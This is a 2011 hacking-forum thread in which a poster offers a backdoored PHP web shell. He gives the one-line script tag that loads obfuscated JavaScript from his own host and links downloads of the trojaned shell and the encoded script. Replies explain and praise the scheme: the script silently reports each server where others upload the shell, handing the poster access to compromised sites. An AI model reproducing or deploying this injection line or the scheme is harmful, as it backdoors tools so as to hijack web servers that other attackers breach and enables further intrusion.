Results 1 to 8 of 8

Thread: Make BackDoored WebShell Share/Save - My123World.Com!

  1. #1

    Make BackDoored WebShell

    Supp ,
    I have made one very small PHP script to steal shell URL (backdoored web-shell).
    To steal the shell URL u needed pest one Javascript line into the Webshell .
    Code:
    <script language="javascript" SRC="http://mysite.com/bc/hide.js"></SCRIPT>
    Like i have made this web-shell backdoored

    Code:
    http://pastebin.com/naKpYfzV
    Download Script :

    Code:
    http://dl.dropbox.com/u/18007092/bc.zip
    Last edited by [s]; 10-17-2011 at 10:36 PM.
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    ... and bounced over me

    Can you please elaborate the concept and functionality of script?

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  3. #3
    Security Researcher
    Join Date
    May 2011
    Location
    Pune, Maharashtra, India
    Posts
    237
    Blog Entries
    1
    I think he is talking about releasing a backdoored webshell in the wild then let others do the job of finding weak pages and injecting backdoors.

    once webshell is installed and working he will get a notification and can then use the url as a remote shell.

    give one free copy and get access to pre backdoored pre rooted online available webservers.
    Website :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

    Blog :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  4. #4
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    hehehe,
    this is what i did some 3years back... added my script into a webshell which mails me the URL of the shell (where it is getting uploaded)...
    and distributed it to Pakistani hackers to keep my eye on thr activity , guess what i was 70% successful... because most of people(script kiddies) don't even check webshells when they are uploading it and blindly upload it

  5. #5
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    @sandeep huff tht js in encoded , will spent some time decoding , unless u ill give out real codes .

    @anant almost all the webshell we used are backdoored ones. Even a reference to the authors site/image itself is enough to backdoor the shells
    Hacking Is a Matter of Time Knowledge and Patience

  6. #6
    I thing bond cleared the topic , Sorry for the incomplete post ...
    @Fb1 please have
    Code:
    http://dl.dropbox.com/u/18007092/hide.js
    newbies can not decode it , @An1l I have goot 30 Shells .
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  7. #7
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Ohhk, got it. Yeah, people hardly care about backdoors in webshells and those who care don't use them without analyzing properly or craft their own.

    Good job Sandeep!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  8. #8
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    Nice work sandeep . Really nice tweak to get others do the job for you ..
    Spirit was turned 2 ashes ,soul endured so much pain..
    now the darker time evanescence ,the fallen shall rise again.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •